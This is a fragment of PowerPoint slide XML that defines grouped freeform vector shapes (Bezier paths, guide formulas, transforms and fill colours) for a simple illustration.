                  <a:gd name="T47" fmla="*/ 69 h 190"/>
                  <a:gd name="T48" fmla="*/ 117 w 159"/>
                  <a:gd name="T49" fmla="*/ 70 h 190"/>
                  <a:gd name="T50" fmla="*/ 118 w 159"/>
                  <a:gd name="T51" fmla="*/ 75 h 190"/>
                  <a:gd name="T52" fmla="*/ 119 w 159"/>
                  <a:gd name="T53" fmla="*/ 87 h 190"/>
                  <a:gd name="T54" fmla="*/ 123 w 159"/>
                  <a:gd name="T55" fmla="*/ 112 h 190"/>
                  <a:gd name="T56" fmla="*/ 159 w 159"/>
                  <a:gd name="T57" fmla="*/ 105 h 190"/>
                  <a:gd name="T58" fmla="*/ 150 w 159"/>
                  <a:gd name="T59" fmla="*/ 49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9" h="190">
                    <a:moveTo>
                      <a:pt x="150" y="49"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="147" y="32"/>
                      <a:pt x="132" y="26"/>
                      <a:pt x="124" y="24"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="22"/>
                      <a:pt x="113" y="20"/>
                      <a:pt x="106" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="40"/>
                      <a:pt x="69" y="72"/>
                      <a:pt x="69" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="83"/>
                      <a:pt x="68" y="181"/>
                      <a:pt x="68" y="181"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="72"/>
                      <a:pt x="69" y="72"/>
                      <a:pt x="69" y="72"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="64"/>
                      <a:pt x="56" y="34"/>
                      <a:pt x="50" y="14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57" y="5"/>
                      <a:pt x="47" y="3"/>
                      <a:pt x="41" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32" y="0"/>
                      <a:pt x="15" y="3"/>
                      <a:pt x="12" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="14"/>
                      <a:pt x="6" y="42"/>
                      <a:pt x="0" y="73"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="81"/>
                      <a:pt x="25" y="83"/>
                      <a:pt x="30" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="33" y="61"/>
                      <a:pt x="35" y="43"/>
                      <a:pt x="35" y="47"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="53"/>
                      <a:pt x="34" y="121"/>
                      <a:pt x="34" y="164"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="169"/>
                      <a:pt x="37" y="174"/>
                      <a:pt x="44" y="174"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="177"/>
                      <a:pt x="87" y="187"/>
                      <a:pt x="94" y="188"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="103" y="190"/>
                      <a:pt x="118" y="180"/>
                      <a:pt x="121" y="169"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="150"/>
                      <a:pt x="121" y="130"/>
                      <a:pt x="121" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="112"/>
                      <a:pt x="120" y="112"/>
                      <a:pt x="120" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="112"/>
                      <a:pt x="120" y="112"/>
                      <a:pt x="121" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="103"/>
                      <a:pt x="120" y="95"/>
                      <a:pt x="119" y="87"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="82"/>
                      <a:pt x="118" y="78"/>
                      <a:pt x="118" y="75"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="73"/>
                      <a:pt x="117" y="72"/>
                      <a:pt x="117" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="69"/>
                      <a:pt x="117" y="69"/>
                      <a:pt x="117" y="69"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="70"/>
                      <a:pt x="117" y="70"/>
                      <a:pt x="117" y="70"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="117" y="71"/>
                      <a:pt x="118" y="73"/>
                      <a:pt x="118" y="75"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="119" y="79"/>
                      <a:pt x="119" y="83"/>
                      <a:pt x="119" y="87"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="94"/>
                      <a:pt x="122" y="102"/>
                      <a:pt x="123" y="112"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="130" y="112"/>
                      <a:pt x="145" y="112"/>
                      <a:pt x="159" y="105"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="155" y="79"/>
                      <a:pt x="151" y="56"/>
                      <a:pt x="150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6" name="Freeform 950">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{581DEB5F-EEBC-4495-B2F9-B10848DE5C2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28" y="-3162"/>
                <a:ext cx="153" cy="97"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 29 w 65"/>
                  <a:gd name="T1" fmla="*/ 39 h 41"/>
                  <a:gd name="T2" fmla="*/ 9 w 65"/>
                  <a:gd name="T3" fmla="*/ 19 h 41"/>
                  <a:gd name="T4" fmla="*/ 15 w 65"/>
                  <a:gd name="T5" fmla="*/ 13 h 41"/>
                  <a:gd name="T6" fmla="*/ 53 w 65"/>
                  <a:gd name="T7" fmla="*/ 16 h 41"/>
                  <a:gd name="T8" fmla="*/ 56 w 65"/>
                  <a:gd name="T9" fmla="*/ 30 h 41"/>
                  <a:gd name="T10" fmla="*/ 29 w 65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" h="41">
                    <a:moveTo>
                      <a:pt x="29" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="37"/>
                      <a:pt x="0" y="23"/>
                      <a:pt x="9" y="19"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="16"/>
                      <a:pt x="12" y="16"/>
                      <a:pt x="15" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="10"/>
                      <a:pt x="53" y="0"/>
                      <a:pt x="53" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="21"/>
                      <a:pt x="46" y="25"/>
                      <a:pt x="56" y="30"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65" y="33"/>
                      <a:pt x="45" y="41"/>
                      <a:pt x="29" y="39"/>
                    </a:cubicBezTo>
                    <a:close/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7" name="Freeform 951">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67BF6F04-82FA-46B5-B2FC-DFFCCE4AD7C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99" y="-3131"/>
                <a:ext cx="211" cy="446"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 89 w 89"/>
                  <a:gd name="T1" fmla="*/ 22 h 189"/>
                  <a:gd name="T2" fmla="*/ 72 w 89"/>
                  <a:gd name="T3" fmla="*/ 17 h 189"/>
                  <a:gd name="T4" fmla="*/ 35 w 89"/>
                  <a:gd name="T5" fmla="*/ 71 h 189"/>
                  <a:gd name="T6" fmla="*/ 34 w 89"/>
                  <a:gd name="T7" fmla="*/ 180 h 189"/>
                  <a:gd name="T8" fmla="*/ 35 w 89"/>
                  <a:gd name="T9" fmla="*/ 71 h 189"/>
                  <a:gd name="T10" fmla="*/ 18 w 89"/>
                  <a:gd name="T11" fmla="*/ 15 h 189"/>
                  <a:gd name="T12" fmla="*/ 21 w 89"/>
                  <a:gd name="T13" fmla="*/ 4 h 189"/>
                  <a:gd name="T14" fmla="*/ 7 w 89"/>
                  <a:gd name="T15" fmla="*/ 1 h 189"/>
                  <a:gd name="T16" fmla="*/ 3 w 89"/>
                  <a:gd name="T17" fmla="*/ 0 h 189"/>
                  <a:gd name="T18" fmla="*/ 0 w 89"/>
                  <a:gd name="T19" fmla="*/ 163 h 189"/>
                  <a:gd name="T20" fmla="*/ 10 w 89"/>
                  <a:gd name="T21" fmla="*/ 173 h 189"/>
                  <a:gd name="T22" fmla="*/ 60 w 89"/>
                  <a:gd name="T23" fmla="*/ 187 h 189"/>
                  <a:gd name="T24" fmla="*/ 87 w 89"/>
                  <a:gd name="T25" fmla="*/ 168 h 189"/>
                  <a:gd name="T26" fmla="*/ 85 w 89"/>
                  <a:gd name="T27" fmla="*/ 86 h 189"/>
                  <a:gd name="T28" fmla="*/ 89 w 89"/>
                  <a:gd name="T29" fmla="*/ 22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9" h="189">
                    <a:moveTo>
                      <a:pt x="89" y="22"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="86" y="21"/>
                      <a:pt x="79" y="19"/>
                      <a:pt x="72" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="53" y="39"/>
                      <a:pt x="35" y="71"/>
                      <a:pt x="35" y="71"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="82"/>
                      <a:pt x="34" y="180"/>
                      <a:pt x="34" y="18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5" y="63"/>
                      <a:pt x="19" y="23"/>
                      <a:pt x="18" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="7"/>
                      <a:pt x="21" y="4"/>
                      <a:pt x="21" y="4"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="1"/>
                      <a:pt x="13" y="2"/>
                      <a:pt x="7" y="1"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="0"/>
                      <a:pt x="5" y="0"/>
                      <a:pt x="3" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="25"/>
                      <a:pt x="0" y="120"/>
                      <a:pt x="0" y="163"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="168"/>
                      <a:pt x="3" y="173"/>
                      <a:pt x="10" y="173"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22" y="176"/>
                      <a:pt x="53" y="186"/>
                      <a:pt x="60" y="187"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="189"/>
                      <a:pt x="84" y="179"/>
                      <a:pt x="87" y="168"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="87" y="149"/>
                      <a:pt x="86" y="94"/>
                      <a:pt x="85" y="86"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="51"/>
                      <a:pt x="89" y="33"/>
                      <a:pt x="89" y="22"/>
                    </a:cubicBez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8" name="Freeform 952">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{719F5EB7-6DDF-4B05-8E22-9C3EDE40DB3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06" y="-3287"/>
                <a:ext cx="189" cy="189"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 38 w 80"/>
                  <a:gd name="T1" fmla="*/ 1 h 80"/>
                  <a:gd name="T2" fmla="*/ 1 w 80"/>
                  <a:gd name="T3" fmla="*/ 41 h 80"/>
                  <a:gd name="T4" fmla="*/ 42 w 80"/>
                  <a:gd name="T5" fmla="*/ 79 h 80"/>
                  <a:gd name="T6" fmla="*/ 79 w 80"/>
                  <a:gd name="T7" fmla="*/ 38 h 80"/>
                  <a:gd name="T8" fmla="*/ 38 w 80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80">
                    <a:moveTo>
                      <a:pt x="38" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="2"/>
                      <a:pt x="0" y="20"/>
                      <a:pt x="1" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="63"/>
                      <a:pt x="20" y="80"/>
                      <a:pt x="42" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="78"/>
                      <a:pt x="80" y="60"/>
                      <a:pt x="79" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="17"/>
                      <a:pt x="60" y="0"/>
                      <a:pt x="38" y="1"/>
                    </a:cubicBezTo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9" name="Freeform 953">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80F955E6-0D50-4CD0-A4F5-62E20F00913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06" y="-3287"/>
                <a:ext cx="189" cy="189"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 38 w 80"/>
                  <a:gd name="T1" fmla="*/ 1 h 80"/>
                  <a:gd name="T2" fmla="*/ 1 w 80"/>
                  <a:gd name="T3" fmla="*/ 41 h 80"/>
                  <a:gd name="T4" fmla="*/ 42 w 80"/>
                  <a:gd name="T5" fmla="*/ 79 h 80"/>
                  <a:gd name="T6" fmla="*/ 79 w 80"/>
                  <a:gd name="T7" fmla="*/ 38 h 80"/>
                  <a:gd name="T8" fmla="*/ 38 w 80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80">
                    <a:moveTo>
                      <a:pt x="38" y="1"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="2"/>
                      <a:pt x="0" y="20"/>
                      <a:pt x="1" y="41"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="63"/>
                      <a:pt x="20" y="80"/>
                      <a:pt x="42" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="78"/>
                      <a:pt x="80" y="60"/>
                      <a:pt x="79" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78" y="17"/>
                      <a:pt x="60" y="0"/>
                      <a:pt x="38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0" name="Freeform 954">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B99F9719-BC3A-49EF-93C3-8F13480FE2B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99" y="-2874"/>
                <a:ext cx="81" cy="45"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3 w 81"/>
                  <a:gd name="T1" fmla="*/ 0 h 45"/>
                  <a:gd name="T2" fmla="*/ 0 w 81"/>
                  <a:gd name="T3" fmla="*/ 24 h 45"/>
                  <a:gd name="T4" fmla="*/ 81 w 81"/>
                  <a:gd name="T5" fmla="*/ 45 h 45"/>
                  <a:gd name="T6" fmla="*/ 81 w 81"/>
                  <a:gd name="T7" fmla="*/ 21 h 45"/>
                  <a:gd name="T8" fmla="*/ 3 w 81"/>
                  <a:gd name="T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45">
                    <a:moveTo>
                      <a:pt x="3" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81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ED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1" name="Freeform 955">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{072E7D5C-A69E-41E5-B961-8A3E4E8388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0" y="-2869"/>
                <a:ext cx="125" cy="54"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 27 w 53"/>
                  <a:gd name="T1" fmla="*/ 23 h 23"/>
                  <a:gd name="T2" fmla="*/ 53 w 53"/>
                  <a:gd name="T3" fmla="*/ 10 h 23"/>
                  <a:gd name="T4" fmla="*/ 53 w 53"/>
                  <a:gd name="T5" fmla="*/ 0 h 23"/>
                  <a:gd name="T6" fmla="*/ 27 w 53"/>
                  <a:gd name="T7" fmla="*/ 13 h 23"/>
                  <a:gd name="T8" fmla="*/ 0 w 53"/>
                  <a:gd name="T9" fmla="*/ 7 h 23"/>
                  <a:gd name="T10" fmla="*/ 0 w 53"/>
                  <a:gd name="T11" fmla="*/ 17 h 23"/>
                  <a:gd name="T12" fmla="*/ 27 w 53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23">
                    <a:moveTo>
                      <a:pt x="27" y="23"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="23"/>
                      <a:pt x="48" y="14"/>
                      <a:pt x="53" y="1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48" y="4"/>
                      <a:pt x="36" y="13"/>
                      <a:pt x="27" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="13"/>
                      <a:pt x="0" y="7"/>
                      <a:pt x="0" y="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7"/>
                      <a:pt x="24" y="23"/>
                      <a:pt x="27" y="23"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFED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2" name="Freeform 956">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A32C8E4F-83C8-48F8-8254-00074380B51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199" y="-2779"/>
                <a:ext cx="81" cy="42"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 3 w 81"/>
                  <a:gd name="T1" fmla="*/ 0 h 42"/>
                  <a:gd name="T2" fmla="*/ 0 w 81"/>
                  <a:gd name="T3" fmla="*/ 21 h 42"/>
                  <a:gd name="T4" fmla="*/ 81 w 81"/>
                  <a:gd name="T5" fmla="*/ 42 h 42"/>
                  <a:gd name="T6" fmla="*/ 81 w 81"/>
                  <a:gd name="T7" fmla="*/ 21 h 42"/>
                  <a:gd name="T8" fmla="*/ 3 w 81"/>
                  <a:gd name="T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42">
                    <a:moveTo>
                      <a:pt x="3" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81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ED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3" name="Freeform 957">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{843FDF8E-EC77-4D16-BFF2-3AB004A1F28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80" y="-2775"/>
                <a:ext cx="125" cy="52"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 27 w 53"/>
                  <a:gd name="T1" fmla="*/ 22 h 22"/>
                  <a:gd name="T2" fmla="*/ 53 w 53"/>
                  <a:gd name="T3" fmla="*/ 10 h 22"/>
                  <a:gd name="T4" fmla="*/ 53 w 53"/>
                  <a:gd name="T5" fmla="*/ 0 h 22"/>
                  <a:gd name="T6" fmla="*/ 27 w 53"/>
                  <a:gd name="T7" fmla="*/ 13 h 22"/>
                  <a:gd name="T8" fmla="*/ 0 w 53"/>
                  <a:gd name="T9" fmla="*/ 7 h 22"/>
                  <a:gd name="T10" fmla="*/ 0 w 53"/>
                  <a:gd name="T11" fmla="*/ 16 h 22"/>
                  <a:gd name="T12" fmla="*/ 27 w 53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22">
                    <a:moveTo>
                      <a:pt x="27" y="22"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="22"/>
                      <a:pt x="48" y="14"/>
                      <a:pt x="53" y="1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48" y="3"/>
                      <a:pt x="36" y="13"/>
                      <a:pt x="27" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24" y="13"/>
                      <a:pt x="0" y="7"/>
                      <a:pt x="0" y="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24" y="22"/>
                      <a:pt x="27" y="22"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="FFED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4" name="Freeform 958">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FC51C9F-DDA9-4AA8-AAFE-D18ECAEFB50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2" y="-2971"/>
                <a:ext cx="21" cy="5"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 21 w 21"/>
                  <a:gd name="T1" fmla="*/ 5 h 5"/>
                  <a:gd name="T2" fmla="*/ 0 w 21"/>
                  <a:gd name="T3" fmla="*/ 0 h 5"/>
                  <a:gd name="T4" fmla="*/ 21 w 21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5">
                    <a:moveTo>
                      <a:pt x="21" y="5"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="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5" name="Line 959">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{816A07C3-B62A-458A-A7F8-B766E6DEBC89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 flipH="1" flipV="1">
                <a:off x="332" y="-2971"/>
                <a:ext cx="21" cy="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657" name="Group 656">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27821F8A-9397-47F2-8545-64C09727EDFE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5472172" y="3796020"/>
              <a:ext cx="363538" cy="538163"/>
              <a:chOff x="3156156" y="3289045"/>
              <a:chExt cx="363538" cy="538163"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="870" name="Group 1063">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A981D04-21AC-49A5-9A54-D3B83B55A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1731" y="3289045"/>
                <a:ext cx="207963" cy="500063"/>
                <a:chOff x="3736" y="1032"/>
                <a:chExt cx="266" cy="635"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="876" name="Freeform 1064">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FCEC1DD-DADE-4DD2-BC61-8CF51DEA3CB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03" y="1338"/>
                  <a:ext cx="121" cy="329"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 89 w 90"/>
                    <a:gd name="T1" fmla="*/ 156 h 245"/>
                    <a:gd name="T2" fmla="*/ 90 w 90"/>
                    <a:gd name="T3" fmla="*/ 7 h 245"/>
                    <a:gd name="T4" fmla="*/ 89 w 90"/>
                    <a:gd name="T5" fmla="*/ 5 h 245"/>
                    <a:gd name="T6" fmla="*/ 63 w 90"/>
                    <a:gd name="T7" fmla="*/ 20 h 245"/>
                    <a:gd name="T8" fmla="*/ 12 w 90"/>
                    <a:gd name="T9" fmla="*/ 10 h 245"/>
                    <a:gd name="T10" fmla="*/ 3 w 90"/>
                    <a:gd name="T11" fmla="*/ 0 h 245"/>
                    <a:gd name="T12" fmla="*/ 3 w 90"/>
                    <a:gd name="T13" fmla="*/ 36 h 245"/>
                    <a:gd name="T14" fmla="*/ 2 w 90"/>
                    <a:gd name="T15" fmla="*/ 205 h 245"/>
                    <a:gd name="T16" fmla="*/ 44 w 90"/>
                    <a:gd name="T17" fmla="*/ 204 h 245"/>
                    <a:gd name="T18" fmla="*/ 45 w 90"/>
                    <a:gd name="T19" fmla="*/ 51 h 245"/>
                    <a:gd name="T20" fmla="*/ 36 w 90"/>
                    <a:gd name="T21" fmla="*/ 39 h 245"/>
                    <a:gd name="T22" fmla="*/ 45 w 90"/>
                    <a:gd name="T23" fmla="*/ 51 h 245"/>
                    <a:gd name="T24" fmla="*/ 44 w 90"/>
                    <a:gd name="T25" fmla="*/ 204 h 245"/>
                    <a:gd name="T26" fmla="*/ 44 w 90"/>
                    <a:gd name="T27" fmla="*/ 211 h 245"/>
                    <a:gd name="T28" fmla="*/ 88 w 90"/>
                    <a:gd name="T29" fmla="*/ 218 h 245"/>
                    <a:gd name="T30" fmla="*/ 89 w 90"/>
                    <a:gd name="T31" fmla="*/ 15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" h="245">
                      <a:moveTo>
                        <a:pt x="89" y="156"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="89" y="140"/>
                        <a:pt x="90" y="47"/>
                        <a:pt x="90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  <a:cubicBezTo>
                        <a:pt x="55" y="19"/>
                        <a:pt x="24" y="13"/>
                        <a:pt x="12" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="9"/>
                        <a:pt x="4" y="4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4"/>
                        <a:pt x="44" y="204"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="43" y="170"/>
                        <a:pt x="46" y="55"/>
                        <a:pt x="45" y="51"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="45" y="47"/>
                        <a:pt x="36" y="46"/>
                        <a:pt x="36" y="39"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="36" y="46"/>
                        <a:pt x="45" y="47"/>
                        <a:pt x="45" y="51"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="46" y="55"/>
                        <a:pt x="43" y="170"/>
                        <a:pt x="44" y="204"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="44" y="206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74118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77" name="Freeform 1065">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C037051D-BA53-4BAD-8291-1532D979E13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736" y="1118"/>
                  <a:ext cx="266" cy="310"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 192 w 198"/>
                    <a:gd name="T1" fmla="*/ 194 h 231"/>
                    <a:gd name="T2" fmla="*/ 169 w 198"/>
                    <a:gd name="T3" fmla="*/ 49 h 231"/>
                    <a:gd name="T4" fmla="*/ 143 w 198"/>
                    <a:gd name="T5" fmla="*/ 24 h 231"/>
                    <a:gd name="T6" fmla="*/ 100 w 198"/>
                    <a:gd name="T7" fmla="*/ 12 h 231"/>
                    <a:gd name="T8" fmla="*/ 60 w 198"/>
                    <a:gd name="T9" fmla="*/ 2 h 231"/>
                    <a:gd name="T10" fmla="*/ 30 w 198"/>
                    <a:gd name="T11" fmla="*/ 11 h 231"/>
                    <a:gd name="T12" fmla="*/ 4 w 198"/>
                    <a:gd name="T13" fmla="*/ 159 h 231"/>
                    <a:gd name="T14" fmla="*/ 36 w 198"/>
                    <a:gd name="T15" fmla="*/ 168 h 231"/>
                    <a:gd name="T16" fmla="*/ 54 w 198"/>
                    <a:gd name="T17" fmla="*/ 47 h 231"/>
                    <a:gd name="T18" fmla="*/ 53 w 198"/>
                    <a:gd name="T19" fmla="*/ 164 h 231"/>
                    <a:gd name="T20" fmla="*/ 62 w 198"/>
                    <a:gd name="T21" fmla="*/ 174 h 231"/>
                    <a:gd name="T22" fmla="*/ 113 w 198"/>
                    <a:gd name="T23" fmla="*/ 188 h 231"/>
                    <a:gd name="T24" fmla="*/ 140 w 198"/>
                    <a:gd name="T25" fmla="*/ 169 h 231"/>
                    <a:gd name="T26" fmla="*/ 140 w 198"/>
                    <a:gd name="T27" fmla="*/ 169 h 231"/>
                    <a:gd name="T28" fmla="*/ 138 w 198"/>
                    <a:gd name="T29" fmla="*/ 87 h 231"/>
                    <a:gd name="T30" fmla="*/ 136 w 198"/>
                    <a:gd name="T31" fmla="*/ 70 h 231"/>
                    <a:gd name="T32" fmla="*/ 136 w 198"/>
                    <a:gd name="T33" fmla="*/ 69 h 231"/>
                    <a:gd name="T34" fmla="*/ 136 w 198"/>
                    <a:gd name="T35" fmla="*/ 70 h 231"/>
                    <a:gd name="T36" fmla="*/ 138 w 198"/>
                    <a:gd name="T37" fmla="*/ 87 h 231"/>
                    <a:gd name="T38" fmla="*/ 159 w 198"/>
                    <a:gd name="T39" fmla="*/ 203 h 231"/>
                    <a:gd name="T40" fmla="*/ 192 w 198"/>
                    <a:gd name="T41" fmla="*/ 194 h 2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8" h="231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6"/>
